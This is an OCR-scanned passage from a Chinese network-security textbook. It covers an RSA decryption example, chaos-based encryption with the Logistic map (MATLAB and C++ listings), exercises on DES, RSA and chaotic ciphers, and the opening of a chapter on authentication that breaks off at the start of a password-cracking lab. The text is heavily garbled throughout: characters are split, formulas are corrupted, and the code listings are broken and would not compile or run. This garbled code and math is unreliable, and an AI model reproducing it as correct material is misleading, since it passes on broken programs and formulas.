(4) 密 文 解密 。 
对 密 文 的 解密 ,解密 密 钥 是 (157,2773) ,套用 M 硅 C” mod ”为 减少 计算 量 ,仍然 使 用 寡 


。 247 。 


模 运 算 的 转换 形式 ,对 第 1 组 加 密 数 据 0948 计算 如 下 : 
0948 三 94857 mod 2773 一 … = 920 

查 表 8-6 ,此 明文 是 “IT”。 类 似 地 ,最 后 得 到 整个 明文 。 

【实验 思考 】 

(1) 在 实验 中 仍然 给 定 2 一 47,4=59 ,但 取 e 一 63。 请 推出 4& ,然后 根据 新 的 公 钥 / 私 钥 
对 实验 中 的 串 进 行 加 解密 ,并 与 上 面 的 实验 结果 相 比 较 。 

(2) 讨论 RSA 中 如 何 更 合理 地 确定 e 和 4d 。 

依 上 例 ,RSA 对 明文 的 加 、 解 密 相 比 DES 似乎 简单 得 多 。 但 实际 运用 要 比 其 复杂 得 
多 ,由 于 RSA 算法 的 公 钥 、 私 钥 的 长 度 ( 模 长 度 ) 要 到 1024 位 甚至 2048 位 才能 保证 安全 , 因 
此 ,2p.q,e 的 选取 , 公 钥 私 钥 的 生成 ,加 密 解 密 模 指数 运算 都 有 一 定 的 计算 程序 ,手工 几乎 难 
以 为 继 , 需 要 仰 仗 计算 机 来 完成 。 

由 于 实际 使 用 的 RSA 需要 1024 位 甚至 2048 位 的 二 进 制 数 , 相 当 于 300 位 左右 的 十 进 
制 数 ,涉及 大 整数 存储 运算 。 大 整数 的 存储 和 运算 对 于 RSA 算法 的 实现 都 是 至 关 重 要 的 ， 
目前 有 一 些 很 成 熟 并 且 开 源 的 大 数 类 库 , 如 GTK、HugeCalc 等 。 


8.5 混沌 加 密 技 术 


混沌 是 自然 界 和 人 类 社会 普遍 存在 的 一 种 现象 。 在 混沌 现象 中 ,只 要 初始 条 件 稍 有 不 
同 , 其 结果 就 大 相 径 庭 ,难以 预测 。 由 于 混沌 系统 的 奇异 性 和 复杂 性 至 今 尚 未 被 人 们 彻底 了 
解 ,混沌 还 没有 公认 的 严格 定义 。 

混沌 来 自 非 线性 动力 系统 。 动 力 系统 描述 的 是 任意 随时 间 变 化 的 过 程 , 这 个 过 程 是 确 
定性 的 、 类 似 随 机 的 、 非 周期 的 .具有 收敛 性 的 ,并 且 对 于 初始 值 有 极 敏 感 的 依赖 性 。 而 这 些 
特性 正 符 合 序列 密码 的 要 求 。 在 有 些 情况 下 ,反映 这 类 现象 的 数学 模型 十 分 简单 ,甚至 一 维 
非 线性 迭代 函数 就 能 显示 出 这 种 混沌 特性 。 因 此 可 以 寻找 这 种 混沌 函数 作为 密码 算法 中 的 
密 钥 流产 生 器 ,用 以 构成 性 能 良好 的 密码 系统 。 

混沌 流 密码 系统 的 设计 主要 采用 以 下 几 种 混沌 映射 : 一 维 Logistic 映射 ,二 维 Henon 
映射 .三维 Lorenz 映射 . 逐 段 线性 混沌 映射 、. 逐 段 非 线性 混沌 映射 等 。 

1. 一 维 Logistic 映射 

一 维 Logistic 映射 是 最 典型 的 ,也 是 研究 得 最 广泛 的 动力 系统 ,此 系统 具有 极其 复杂 的 
动力 学 行为 ,在 保密 通信 和 领域 的 应 用 十 分 广泛 。 从 数学 形式 上 看 ,Logistic 映射 是 一 个 非常 
简单 的 混沌 映射 , 它 用 一 维 非 线 性 迭代 函数 来 表征 混沌 行为 ,通过 这 一 混沌 函数 可 以 通过 微 
小 地 改变 调节 参数 的 值 来 产生 完全 不 同 的 伪 随 机 序列 。 其 数学 表达 公式 如 下 : 

Xn 一 AX, (1 一 X) 

其 中 为 控制 参量 ,0 二 二 4。y 值 确定 后 ,由 任意 初 值 XvE (0,1], 可 迭代 出 一 个 确定 的 时 
间 序 列 。 对 于 不 同 的 x 值 ,Logistic 映射 将 呈现 不 同 的 特性 , 随 着 参数 w 的 增加 ,方程 不 断 
地 经 历 倍 周期 分 又 , 当 3. 569 945 6 二 jy<4 时 ,Logistic 映射 工作 在 混沌 状态 ,其 输入 和 输出 
都 分 布 在 区 间 (0.,1) 上 。 当 y= 二 4 时 ,该 映射 产生 的 序列 是 满 射 , 是 非 周 期 不 收敛 的 ,对 初始 
条 件 敏感 。 

如 果 取 六 ==0.5, 夫 代 300 次 ,Logistic 映射 图 MATLAB 的 程序 如 下 : 
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for u=0:0.005:47 
x= zeros (1, 301); 
x(1)=0.5; 
for i=1:300 
x(i+1)=ux* x(i)* (1-x(i)); 
end 
Plottwrz(s2:301)7 "r= 6") 
hold on; 


end 
所 形成 的 图 像 如 图 8-11 所 示 , 其 中 横 轴 表示 w 的 取 值 范围 , 纵 轴 表示 X 的 取 值 范围 。 
图 中 的 点 即 表明 了 所 有 可 能 的 X 取 值 范围 。 由 图 可 见 , 当 jy<3 时 ,系统 有 稳 态 解 ,周期 数 
为 1。 当 /在 3 附近 时 ,系统 的 稳 态 解 由 周期 数 1 变 为 周期 数 2, 是 一 个 分 又 过 程 。 当 4 在 
3.45 附近 时 ,系统 的 稳 态 解 由 周期 2 变 为 周期 4, 随 着 参数 的 不 断 增 大 ,周期 数 不 断 加 倍 , 产 
生 的 序列 值 周而复始 的 在 有 限 个 周期 轨道 之 间 重 复 。 随 着 w 的 增长 ,出现 分 贫 位 置 的 间隔 
越 来 越 小 ,大 约 在 wx 一 3.6 附近 ,分 贫 数 已 看 不 清楚 ,系统 进入 混沌 状态 。 在 /w 越 接近 4 的 地 
方 ,X 的 取 值 范围 越 是 接近 平均 分 布 在 整个 0 一 1 的 区 域 ,因此 需要 选取 的 Logistic 控制 参 
数 应 该 越 接近 4 越 好 。 
1 


图 8-11 X=0.5. 迭 代 300 次 时 的 Logistic 映射 图 


2. 一 维 Logistic 映射 的 安全 性 分 析 

Logistic 混沌 映射 是 一 种 非常 简单 却 被 广泛 应 用 的 经 典 混沌 映射 ,其 主要 不 足 是 存在 
“稳定 窗 ” 和 空白 窗口 问题 ,同时 密 钥 空间 比较 小 ,所 产生 的 迭代 序列 作为 密 钥 流 使 用 时 存在 
安全 隐患 。 

Logistic 映射 所 产生 的 序列 在 整个 (0,1) 范 围 内 不 具备 均匀 分 布 特性 , 当 yy 二 4 时 ,产生 
的 序列 不 能 布 满 (0,1) 这 个 区 间 , 当 y==4 时 ,所 产生 的 序列 虽然 能 布 满 (0,1) 这 个 区 间 , 但 
分 布 是 不 均匀 的 。 由 于 Logistic 映射 的 分 布 不 均匀 特性 , 将 直接 导致 算法 的 加 密 效率 
较 低 。 

设 x(n) 是 第 nn 次 映射 的 结果 ,zx(n 十 1) 是 第 nn 十 1 次 映射 的 结果 ,利用 相 空间 重 构 法 , 当 
系统 进入 混沌 状态 ,其 相 空 间 为 如 图 8-12 所 示 的 抛物 线 。 由 图 可 见 ,Logistic 映射 的 相 空 间 
结构 是 一 种 简单 的 单 峰 结构 ( 单 峰 映 射 ) .这 使 得 密码 分 析 者 可 以 用 神经 网 络 、 重 构 相 空间 法 
或 非 线性 回归 法 进行 逼近 分 析 和 预测 混沌 信号 ,从 而 可 能 失去 了 混沌 序列 的 安全 性 。 

观察 图 8-11, 可 以 注意 到 ,混沌 区 中 有 些 空白 的 窗口 ,这 种 窗口 与 初始 值 的 选择 无 关 。 
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图 8-12 Logistic 混沌 映射 的 相 空 间 结构 图 


即 不 管 初始 值 为 多 少 , 这 种 空白 窗口 都 是 存在 的 。 在 这 些 窗口 中 产生 的 序列 只 有 少数 几 个 
值 ,因此 这 种 序列 几乎 没有 随机 性 ,用 它 来 加 密 就 没有 安全 性 。 由 于 这 种 周期 窗口 太 多 ,在 
选择 参数 y 时 就 存在 很 大 困难 ,如 果 不 小 心 磁 上 一 个 周期 窗口 上 的 参数 ,就 存在 很 大 的 安全 

3. Logistic 映射 算法 实例 

实验 8-3 Logistic 映射 算法 

【实验 要 求 】 

采用 Logistic 映射 X,+i 二 pyX, (1 一 X,), 初 始 值 X。== 0. 33333333, 偏 移 量 y= 
3. 99999999 ,对 明文 "ITS ALL GREEK TO ME” 进 行 加 、 解 密 运算 。 

【实验 原理 】 

基于 混沌 序列 加 密 是 将 消息 分 成 连续 的 符号 或 比特 串 作为 密 钥 流 ,然后 和 对 应 的 明文 
流 分 别 进行 加 密 。 由 于 各 种 消息 ( 报 文 .语音 、 图 像 和 数据 等 ) 都 可 以 经 过 量化 编码 等 技术 转 
化 为 二 进 制 数字 序列 ,因此 假设 序列 中 的 明文 空间 M、 密 文 空间 C 和 序列 空间 K 都 是 由 二 
进 制 数 字 序 列 组 成 的 集合 。 对 于 每 一 个 kEK, 由 算法 Z 确定 一 个 二 进 制 密 钥 序列 = (k) 一 
xyziyzaywy 当 明文 办 三 mo, ,7 ,1n,_1 时 ,在 密 钥 下 的 加 密 过 程 为 : 对 i=0,1， 
2.,…,7 一 1 计算 c= 二 m; XOR xz 。 密 文 为 c 王 Ek(m) 王 coclycz…ci。 解 密 过 程 为 : 对 
i 二 0,1,2,…,n 一 1 计算 m= 二 cc; XOR xz;。 由 此 恢复 明文 m= 二 Dk(c)= 二 mo yz ym 72 。 
这 个 过 程 如 图 8-13 所 示 。 


密 钥 同 世 
窗 负 序列 生成 映 ” | -_ 密 角 同 妙 | 奉 负 序列 生成 加 
密 
钥 
序 
列 
k 
明文 序列 明文 序列 m 


密 文 序列 c; 


加 密 算法 EK 解密 算法 DK 


图 8-13 序列 密码 通信 模型 


由 此 可 见 , 序 列 密码 的 安全 性 主要 依赖 于 密 钥 序 列 x(8) 二 zo ,zi ,x;，…, 因 此 序列 密码 
系统 设计 的 关键 是 如 何 设计 出 具有 良好 特性 的 随机 密 钥 序列 。 
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【实验 过 程 】 

对 于 Logistic 映射 , 当 y 宇 3. 569946 时 ,X 的 值 不 再 振荡 ,Logistic 映射 进入 混沌 ,于 是 
定义 参数 /= 3. 9999999, X 初始 值 为 0. 33333333, 则 该 加 密 解 密 算法 的 密 钥 Key 为 
(3. 9999999 ,0. 33333333) 。 

加 密 时 先 将 映射 迭代 1000 次 ,然后 对 每 个 字符 再 迭代 10 次 ,计算 得 到 X 值 , 取 X 值 的 
小 数 点 后 7、8、9 位 模 256 得 到 密 钥 流 &, 将 & 与 该 字符 串 异 或 得 到 加 密 后 的 结果 ,结果 大 多 
是 不 可 显示 字符 ,或 者 说 是 一 堆 乱 码 。 

加 密 和 解密 是 相同 的 操作 ,前 提 是 需要 知道 密 钥 Key, 由 于 混沌 映射 对 于 参数 和 初 值 敏 
感 ,如 果 密 钥 不 对 ,解密 结果 将 会 与 明文 差别 很 大 。 


// 基 于 Logistic 映 射 (X[n+1]=uxX[n] * (1-X[n]),u€ [0,4] ;XE [0,1]) 的 混沌 加 密 解 密 程序 
#include< iostream> 
#include< cmath> 
#include< string> 
#include< cstring> 
#include< iomanip> 
using namespace std; 
long double key[2]= {3.9999999, 0.33333333}; // 密 钥 
Unsigned char P[20]= "ITS ALL GREEK TO ME"; // 明 文 
// 取 x 值 的 小 数 点 后 7.8、9 位 模 256 得 到 密 钥 流 k 
unsigned char getKey (long double x) 
{ 
x* =1000000000; 
int tmp= (int)x; 
tmp%= 1000; 
unsigned char k; 
k= tmp%256; 
return k; 
} 
// 加 密 
unsigned char * en(unsigned char * p) 
{ 
unsigned char * c=new unsigned char[20]; // 加 密 的 结果 
long double u= key[0]; 
long double x= key[1]; 
int i,j; 
// 先 迭代 1000 次 
for (i=0;i< 1000;i++) 
4 
X=UX Xx (1 一 X) 7 
} 
for (i=0;i< 100;i++) 
{ 
// 对 于 每 个 字符 再 迭代 10 次 
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for(j=0;j<10;j++) 
{ 
X=Ux Xx (1- x); 
, 
// 取 x 值 的 小 数 点 后 7.8、9 位 模 256 得 到 密 钥 流 k 
unsigned char k= getKey (x) 7 
// 将 密 钥 流 kx 与 该 字符 串 异 或 得 到 加 密 后 的 结果 
c[i]l=k’p[il]; 
i 
return c; 
} 
// 解 密 
unsigned char * de (unsigned char * c) 
{ 
return en(c); 
} 
int main() 
| 
unsigned char * c=en(p); 
int i; 
cout<< "加 密 结果 (十 进 制 表示 ):"<< endl; 
for (i=0;i< 20;i++) 
lf 
cout<< (int) (c[i])<<" "7 
} 
cout<<endl; 
cout<< "解密 结果 :"<< endl; 
unsigned char * pl=de(c); 
for (i=0;i< 20;i++) 
{ 
cout<<pl[i]<<""; 
} 
cout<<endl; 
return 0; 


} 


【实验 思考 】 

(1) 在 4 的 值 确定 之 后 ,一 维 Logistic 映射 是 否 具 有 雪崩 效应 ? 

(2) 从 密 钥 空间 及 密 钥 敏 感性 两 方面 对 算法 进行 性 能 分 析 。 

混沌 系统 由 于 对 初 值 有 极端 的 敏感 性 ,很 小 的 初 值 误差 就 能 被 系统 放大 ,生成 的 混沌 序 
列 具 有 伪 随 机 性 和 非 周期 性 ,其 结构 复杂 ,难以 分 析 和 预测 。 如 果 没 有 得 到 迭代 方程 及 其 初 
值 x,, 则 无 法 预测 下 一 个 迭代 值 。 这 些 特性 使 混沌 序列 有 可 能 成 为 一 种 实际 可 用 的 密码 体 
制 ,适合 于 序列 加 密 技术 。 

混沌 系统 的 特性 使 得 它 在 数值 分 布 上 不 符合 概率 统计 学 原理 , 得 不 到 一 个 稳定 的 概率 
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分 布 特征 。 另 外 , 混沌 数 集 是 实数 范围 ,还 可 以 推广 到 复数 范围 。 因 此 ,从 理论 上 讲 , 利用 
混沌 原理 对 数据 进行 加 密 , 可 以 防范 频率 分 析 攻 击 、 穷 举 攻击 等 攻击 . 使 得 密码 难于 分 析 、 
破译 。 混 沌 加 密 算法 的 加 密 和 解密 过 程 是 可 以 重用 的 ,这 样 其 所 占用 的 空间 大 为 缩小 。 

应 用 混沌 系统 进行 密码 设计 ,还 只 有 得 短 的 二 十 余年 的 时 间 ,密码 学 界 对 混沌 密码 的 认 
识 还 比较 粗浅 。 目 前 在 物理 学 和 电子 学 方面 仍然 不 断 有 新 的 混沌 密码 算法 出 现 ,而 密码 学 
界 的 相关 成 果 则 较 少 ,这 一 方面 是 由 于 成 熟 的 密码 系统 已 经 比较 多 了 , 另 一 方面 是 由 于 混沌 
密码 设计 理论 的 缺乏 。 已 有 的 混沌 加 密 算法 多 数 用 于 图 像 加 密 。 


习题 8 
1. 判断 题 
(1) 密码 学 是 一 门 研究 秘密 信息 的 隐 写 技术 的 学 科 。 ( ) 
(2) DES 即 数据 加 密 标准 , 它 属于 对 称 加 密 算法 的 一 种 。 ( ) 
(3) RSA 是 一 种 公 钥 加 密 算法 。 ( ) 
2. 填空 题 
(1) 对 称 加 密 机 制 的 安全 性 取决 于 的 保密 性 。 
(2) 进行 唯 密 文 攻击 时 ,密码 分 析 者 已 知 的 信息 包括 要 解密 的 密 文 和 a 
(3) DES 算法 是 对 称 或 传统 的 加 密 体制 ,算法 的 最 后 一 步 是 
(4) 如 果 ao= mod rr 成立, 则 称 a 与 5 对 模 r 是 的 。 
(5) 是 DES 算法 的 核心 部 分 , 它 提供 很 好 的 置 乱 数据 效果 ,提供 了 更 好 的 安 
全 性 。 

3. 单 选 题 
(1) 在 DES 中 ,数据 以 ( ) 位 分 组 进行 加 密 。 

A. 16 B. 32 C. 64 LD: 128 
(2) 在 DES 中 , 密 钥 长 度 为 ( ) 位 。 

Ke 让 C. 56 D. 128 
(3) DES 属于 ( ) 算 法 。 

A. 复杂 加 密 B. 简单 加 密 C. 对 称 加 密 D. 非 对 称 加 密 
(4) RSA 的 数学 困难 性 是 ( )。 

A. 离散 困难 性 B. 椭圆 曲线 群 上 的 离散 对 数 困难 性 

C. 大 整数 分 解 的 困难 性 D. 离散 对 数 困难 性 
(5) RSA 是 一 种 ( ) 算 法 。 

A. 对 称 加 密 B. 私 钥 加 密 C. 公 钥 加 密 D. 秘密 加 密 
(6) RSA 算法 需要 ( ) 个 密 钥 。 

A. 1 让 次 C.3 D. 4 


(7) 防止 静态 信息 被 非 授 权 访问 和 防止 动态 信息 被 截取 解密 是 (。  )。 
A. 数据 完整 性 B. 数据 可 用 性 C. 数据 可 靠 性 D. 数据 保密 性 
(8) 基于 密码 技术 的 访问 控制 是 防止 ( 。””) 的 主要 防护 手段 。 
A. 数据 传输 泄密 B. 数据 传输 丢失 
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C. 数据 交换 失败 D. 数据 备份 失败 
(9) 在 DES 算法 中 ,扩展 置换 后 的 E(R) 与 子 密 钥 异 或 后 输入 ( ” ”) 到 S 盒 代 替 。 


A. 64 位 B. 54 位 C. 48 位 D. 32 位 
(10) RSA 算法 的 安全 性 取决 于 一 zd 中 ( ) 和 pg 的 保密 性 。 

A. 了 大 小 B. pq 的 分 解难 度 

C. 与 p,q 无 关 D. 与 pq 有关 


(11) 使 用 S 盒 时 ,如 S 盒 的 输入 为 aaaaaa, 则 取 aa 作 为 S 盒 的 列 号 j, 取 aaaa 作为 S 盒 
的 列 号 i, 对 应 S 盒 的 ( ) 元 素 为 S 盒 输出 。 
A La B. (i,1) CG,. (is7) D, (G2) 
(12) RSA 算法 需要 计算 m modr 等 值 ,由 于 mm 值 巨大 ,可 以 使 用 ( ) 来 计算 m mod 


A. 压缩 算法 B. 平方 - 乘 算法 C. 扩展 算法 D， 置换 算法 
(13) RSA 算法 的 理论 基础 是 ( 5 

A. DES B. 替换 与 代 换 相 组 合 

C. 大 数 分 解 和 素数 检测 D. 哈 希 函数 
(14) 数字 签名 技术 是 ( ) 加 密 算 法 的 应 用 。 

A. 不 对 称 B. 对 称 C. PGP D. SSL 


4. 已 知 明 文 区 二 computer, 密 钥 有 二 program, 仿 照 本 章 实 例 用 DES 将 m 加 密 为 密 文 。 
写 出 以 下 各 步骤 的 结果 。 

@ 交 经 过 JIP 置换 后 得 到 LL, 和 R,。 

@ 密 钥 通过 PC, 得 到 C, 和 DD,。 

再 各 自 左 移 1 位 ,通过 PC; 得 到 48 位 的 KK。 

@ R,(32 位 ) 经 下 作用 扩展 为 48 位 。 

@ 再 和 K, 异 或 (写成 8 组 )。 

@@ 通过 S 盒 后 输出 32 位 。 

@ 对 S 盒 的 输出 进行 P 置 换 。 

@ 计算 L 和 和民 。 

@ 迭代 16 次 后 ,得 到 密 文 。 

5. RSA 实验 。 

(1) 熟悉 密 钥 生成 器 RSAKit、RSA 计算 工具 RSATool( 从 网 络 下 载 ) 。 

(2) 用 工具 获得 1024 位 的 及 de, 对 明文 M==0x11111111111122222222222233333333333 
进行 加 /解密 运算 。 

6. 编程 实现 DES 加 解密 算法 。 

(1) DES 算法 主要 有 哪儿 部 分 ? 画 出 算法 流程 图 。 

(2) 编程 实现 DES 加 解密 算法 ,以 Visual C++ 为 例 ,使 用 如 下 函数 : 


static void DES (char Out [8], char In[8], const SUBKEY P pskey, bool Type); 
// 标 准 DES 加 /解密 
static void SETKEY (const char * Key, int len); // 设 置 密 钥 
static void Set SubKey (SUBKEY P pskey, const char Key[8]); // 设 置 子 密 钥 
。254。 


static void F_FUNCTION (bool In[32]，const bool Ki [48])7 
// 完 成 扩展 置换 、.s 盒 代替 和 P 盒 置换 


static void S_BOXF (bool Out [32], const bool In[48]); //S 盒 代替 函数 
static void TRANSFORM (bool * Out, bool # In, const char * Table, int len) 7 
// 变 换 函 数 
static void XOR (bool * InA, const bool * InB, int len); // 异 或 函数 
static void CYCLELEFT (bool * In, int len, int loop); // 循 环 左 移 函 数 
static void ByteTbBit (bool * Out，const char * In, int bits); // 字 节 组 转换 成 位 组 函数 
static void BitToByte (char * Out，const bool * In, int bits); // 位 组 转换 成 字 节 组 函数 


(3) 要 求 程序 有 简洁 友好 的 界面 ,功能 上 能 实现 对 明文 的 加 /解密 。 

7. 编程 实现 RSA 加 解密 算法 。 

(1) RSA 算法 主要 有 哪 几 个 步 又? 画 出 算法 流程 图 。 

(2) 编程 实现 RSA 加 解密 算法 。 要 求 程序 有 简洁 友好 的 界面 ,功能 上 能 实现 对 明文 的 
加 /解密 。 

8. RSA 有 3 种 可 能 的 攻击 方法 : 

(1) 强行 攻击 , 即 尝试 所 有 可 能 的 密 钥 。 

(2) 数学 攻击 , 即 对 两 个 素数 乘积 的 因子 分 解 。 

(3) 定时 攻击 , 即 依赖 于 解密 算法 的 运行 时 间 。 

试 讨论 这 几 种 攻击 实现 的 可 能 性 。 

9. 在 经 典 的 RSA 算法 中 ,生成 的 素数 的 质量 对 系统 的 安全 性 有 很 大 的 影响 。 目 前 大 
素数 的 生成 ,尤其 是 随机 大 素数 的 生成 主要 是 使 用 素数 测试 算法 ,Miller-Rabin 算法 是 目前 
主流 的 基于 概率 的 素数 测试 算法 ,在 密码 安全 体系 构建 中 占有 重要 的 地 位 。 请 了 解 和 讨论 
Miller-Rabin 算法 ,并 尝试 编程 实现 。 

10. Cat 映射 和 Logistic 映射 双 混沌 系统 的 数字 混沌 加 密实 验 。 

Cat 映射 是 一 个 二 维 的 可 逆 混 沌 映射 ,其 动力 学 方程 由 下 式 表示 : 

Te 
[= oJ] wea 
一 种 改进 的 Logistic 映射 动力 学 方程 如 下 : 
zh = (B+ [1+1/BJzr,(1— xz.)? 
式 中 8 为 L1,4] 之 间 的 一 个 实数 ，zoE (0,1)。 

具体 加 密 算 法 如 下 : 

(1) 针对 上 面 两 个 方程 , 先 选 定 1.1.8 3 个 参数 和 zu,yi ,zf 3 个 初始 值 作为 密 钥 。 

(2) 各 迭代 200 次 ,得 到 xz, 、y, ze。 

(3) 计算 zc, Xy,XzsX100, 并 取 乘 积 的 第 2、4、6、8、10 位 组 成 一 个 5 位 十 进 制 数 与 256 
取 余 ,得 到 一 个 8 位 密 钥 流 ,与 明文 做 异 或 运算 ,形成 一 个 密 文字 节 。 

(4) 迭代 5 次 (从 运算 速度 考虑 ) ,得 到 zx,+1、ys+1、zs+1, 反 复 执行 (3)、(4), 直 到 所 有 明 
文字 节 都 加 密 完毕 。 

请 完成 上 面 的 实验 。 并 对 算法 作 下 列 分 析 : 

(1) 密 钥 空间 分 析 。 

(2) 密 钥 敏感 性 分 析 。 
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(3) 统计 学 分 析 。 

(4) 时 间 代 价 分 析 。 

(5) 空间 代价 分 析 。 

11. 非 线 性 混沌 映射 (NCMD) 动 力 方程 如 下 : 

zori = (1 B Vetan(T $43)(! 十 广 ) an(ez)Gl — x) 
其 中 ,a 和 8B 是 控制 参数 ,该 非 线性 混沌 映射 展示 出 了 良好 的 非 线 性 性 质 , 并 且 均 匀 分 布 在 
(0, 1) 区 间 内 ,同时 性 能 也 较 好 。 当 x, 位 于 区 间 (0, 1) 内 ,控制 参数 a 和 8B 位 于 以 下 区 间 内 
时 ,NCM 展现 出 了 混沌 性 质 : 
a€ (0,1.4), BE [5,43] 


或 
a (ld Ld] .BE [9,38] 
或 
a € (1.5,1.57], BE [3,15] 
(1) 分 别 画 出 3 个 区 间 的 映射 图 。 
(2) 取 和 迭代 初 值 x, 二 0.666 ,a 二 0.7,B 二 28.0。 仿照 习题 10 进行 实验 。 
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第 9 章 认证 技术 


认证 技术 是 确保 操作 者 的 物理 身份 与 数字 身份 相对 应 的 一 种 技术 ,是 保证 网 络 安 全 的 
重要 方法 。 本 章 介 绍 了 多 种 认证 技术 ,包括 口令 身份 认证 .PKI 数字 证 书 技术 、 数 字 签名 技 
术 、SSL 技术 ,智能卡 认 证 、 基 于 生物 特征 认证 。 


9.1 认证 技术 概述 


认证 指 的 是 证 实 被 认证 对 象 是 否 属实 和 是 否 有 效 的 一 个 过 程 。 身 份 认证 技术 是 在 计算 
机 网 络 中 确认 操作 者 身份 的 过 程 而 产生 的 有 效 解决 方法 ,也 是 防止 主动 攻击 的 重要 技术 
手段 。 

计算 机 网 络 中 的 一 切 信息 ,包括 用 户 的 身份 信息 ,都 是 用 一 组 特定 的 数据 来 表示 的 , 计 
算 机 只 能 识别 用 户 的 数字 身份 ,所 有 对 用 户 的 授权 也 是 针对 用 户 数字 身份 的 授权 。 如 何 保 
证 以 数字 身份 进行 操作 的 操作 者 就 是 这 个 数字 身份 的 合法 拥有 者 ,也 就 是 说 保证 操作 者 的 
物理 身份 与 数字 身份 相对 应 ? 身份 认证 技术 就 是 为 了 解决 这 个 问题 。 

身份 认证 是 保护 信息 系统 安全 的 第 一 道 关 卡 ,加 密 是 信息 安全 体系 的 核心 ,而 且 高 度 安 
全 的 身份 认证 技术 必须 建立 在 密码 学 的 基础 上 。 身 份 认证 技术 的 发 展 经 历 了 从 软件 认证 到 
硬件 认证 ,从 单 因子 认证 到 双 ( 多 ) 因 子 认 证 ,从 静态 认证 到 动态 认证 的 过 程 。 常 见 的 身份 认 
证 方法 有 基于 静态 密码 的 鉴别 方法 ,基于 动态 密码 的 鉴别 方法 ,基于 智能 卡 、 令 牌 的 鉴别 方 
法 ,基于 PKI 数字 证 书 的 鉴别 方法 ,基于 生物 特征 的 鉴别 方法 (指纹 、 掌 纹 、 虹 膜 , 视 网 膜 、 人 
脸 \ 语 音 、 签 名 等 ) 等 。 

认证 协议 是 进行 认证 双方 所 采取 的 一 系列 步骤 。 认 证 协议 主要 分 为 单 向 认证 和 双向 认 
证 两 种 。 如 果 是 依赖 于 第 三 方 的 ,可 分 为 基于 可 信 第 三 方 认证 协议 和 双方 认证 协议 。 认 证 
协议 按 使 用 的 密 钥 体制 ,可 分 为 基于 对 称 密 钥 的 认证 协议 和 基于 公 钥 密码 体制 的 认证 协议 。 
如 果 是 按 认 证 实体 的 个 数 ,可 分 为 单 向 认证 协议 和 双向 认证 协议 。 从 身份 认证 的 基本 原理 
上 来 说 ,身份 认证 可 以 分 为 静态 身份 认证 和 动态 身份 认证 。 


9.2 静态 口令 身份 认证 


静态 口令 是 一 种 单 因素 认证 方法 ,其 实现 原理 比较 简单 。 当 用 户 需 要 访问 系统 资源 时 ， 
系统 提示 用 户 输 入 用 户 名 和 和 口令。 系统 采用 加 密 方式 或 明文 方式 将 用 户 名 和 口令 传送 到 认 
证 中 心 , 与 认证 中 心 保存 的 用 户 信息 进行 对 比 。 如 果 验 证 通过 ,系统 允许 该 用 户 进行 随后 的 
访问 操作 ,否则 拒绝 用 户 的 进一步 访问 操作 。 

单 因素 静态 口令 身份 认证 是 著名 的 “用 户 名 十 口令 ”的 身份 验证 方式 ,是 使 用 最 为 广泛 
的 身份 认证 方案 。 虽 然 用 户 名 、 口 令 的 身份 验证 方式 早已 被 认为 是 弱 安 全 性 的 , 但 是 因为 
其 简单 `. 易 用 注册 验证 高 效 等 优点 而 仍 被 广泛 使 用 。 荐 态 口 令 认 证 一 般 分 为 两 个 阶段 : 第 
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阶段 是 身份 识别 阶段 ,确认 认证 对 象 ;第 2 阶段 是 身份 验证 阶段 ,获取 身份 信息 进行 验证 ， 
以 确认 被 认证 对 象 是 否 为 合法 访问 者 。 

在 用 户 名 口令 身份 验证 中 ,用 户 账 户 的 安全 性 实际 上 完全 由 服务 器 所 操控 。 在 实际 应 
用 中 ,用 户 虽 然 有 自己 的 口令 (此 口令 也 可 以 不 存储 在 服务 器 中 ) ,但 如 果 系 统 的 认证 函数 和 
数据 库 中 存储 的 注册 信息 被 公开 或 泄露 ,用 户 则 无 密 可 保 。 而 一 旦 身份 认证 系统 被 攻破 , 系 
统 随后 的 安全 措施 就 将 形同虚设 。 最 典型 的 是 Windows 的 用 户 / 口 令 登 录 认 证 方式 已 经 拥 
有 众多 的 破解 软件 ,在 线 / 离 线 的 破解 方式 均 有 。 

静态 口令 身份 认证 的 优点 是 : 一 般 的 系统 (如 UNIX、Windows 等 ) 都 提供 了 对 密码 认 
证 的 支持 ,对 于 封闭 的 小 型 系统 来 说 , 它 不 失 为 一 种 简单 可 行 的 方法 。 其 不 足 表现 在 以 下 几 
方面 : 

(1) 用 户 每 次 访问 系统 时 都 要 以 明文 方式 输入 口令 ,很 容易 泄密 。 

(2) 口令 在 传输 过 程 中 可 能 被 截获 。 即 使 口令 以 密 文 的 形式 在 网 络 中 传输 ,非法 的 第 
三 方 也 可 能 会 将 在 线 截 获 的 口令 用 于 其 他 认证 ,进行 重 放 攻 击 。 

(3) 可 以 登录 计算 机 ,进行 在 线 口 令 猜测 。 

(4) 系统 中 所 有 用 户 的 口令 以 文件 形式 存储 在 认证 方 ,攻击 者 可 以 利用 系统 中 存在 的 
漏洞 获取 系统 的 口令 文件 ,然后 可 以 离线 破解 。 

(5) 用 户 在 访问 多 个 不 同安 全 级 别 的 系统 时 ,都 要 求 用 户 提 供 口 令 , 用 户 为 了 记忆 的 方 
便 ,往往 采用 相同 的 口令 。 而 低 安全 级 别 系统 的 口令 更 容易 被 攻击 者 获得 ,从 而 用 来 对 高 安 
全 级 别 系 统 进行 攻击 。 

(6) 只 能 进行 单 向 认证 , 即 系统 可 以 认证 用 户 ,而 用 户 无 法 对 系统 进行 认证 。 攻 击 者 可 
能 伪装 成 系统 骗取 用 户 的 口令 。 

虽然 可 以 采取 对 口令 进行 加 密 传 输 、 对 口令 以 不 可 逆 加 密 ( 如 散 列 函数 ) 存 储 等 措施 ,但 
攻击 者 还 是 可 以 利用 一 些 黑客 工具 很 容易 地 破解 口令 和 口令 文件 。 这 种 认证 方式 特别 是 在 
口令 强度 .传输 、 验 证、 存储 等 许多 环节 都 存在 严重 的 安全 隐患 ,是 最 不 安全 的 认证 技术 。 例 
如 存储 Windows 系统 口令 的 SAM 文件 就 有 许多 破解 方法 。 目 前 ,60% 以 上 的 成 功 的 网 络 
攻击 都 是 通过 破解 口令 的 方式 完成 的 ,这 对 信息 和 网 络 资源 造成 严重 的 威胁 ,直接 造成 信息 
失 密 或 经 济 损失 。 

实验 9-1 Windows 口令 破解 实例 

【实验 目的 】 

通过 口令 破解 工具 的 使 用 ,了 解 账号 口令 的 安全 性 ,掌握 安全 口令 设置 原则 ,以 保护 账 
号 口令 的 安全 。 

【实验 原理 】 

有 关系 统 用 户 账号 口令 的 破解 主要 是 基于 口令 匹配 的 破解 方法 ,最 基本 的 方法 有 两 个 ， 
